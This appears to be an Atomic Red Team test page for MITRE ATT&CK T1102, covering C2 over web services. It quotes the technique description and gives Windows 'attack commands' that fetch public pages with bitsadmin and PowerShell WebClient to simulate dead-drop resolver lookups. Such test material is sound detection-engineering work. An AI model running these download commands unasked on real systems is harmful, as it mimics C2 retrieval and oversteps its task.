# T1102 - Web Service
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1102)
<blockquote>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.

These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</blockquote>

## Atomic Tests

- [Atomic Test #1 - Reach out to C2 Pointer URLs via command_prompt](#atomic-test-1---reach-out-to-c2-pointer-urls-via-command_prompt)

- [Atomic Test #2 - Reach out to C2 Pointer URLs via powershell](#atomic-test-2---reach-out-to-c2-pointer-urls-via-powershell)


<br/>

## Atomic Test #1 - Reach out to C2 Pointer URLs via command_prompt
Download data from a public website using command line

**Supported Platforms:** Windows





#### Attack Commands: Run with `command_prompt`! 


```cmd
bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html
```

#### Cleanup Commands:
```cmd
del %TEMP%\bitsadmindownload.html >nul 2>&1
```





<br/>
<br/>

## Atomic Test #2 - Reach out to C2 Pointer URLs via powershell
Multiple download methods for files using powershell

**Supported Platforms:** Windows





#### Attack Commands: Run with `powershell`! 


```powershell
Invoke-WebRequest -Uri www.twitter.com
$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
$wc = New-Object System.Net.WebClient
$T1102 = $wc.DownloadString("https://www.aol.com/")
```

#### Cleanup Commands:
```powershell
Clear-Variable T1102 >$null 2>&1
```





<br/>
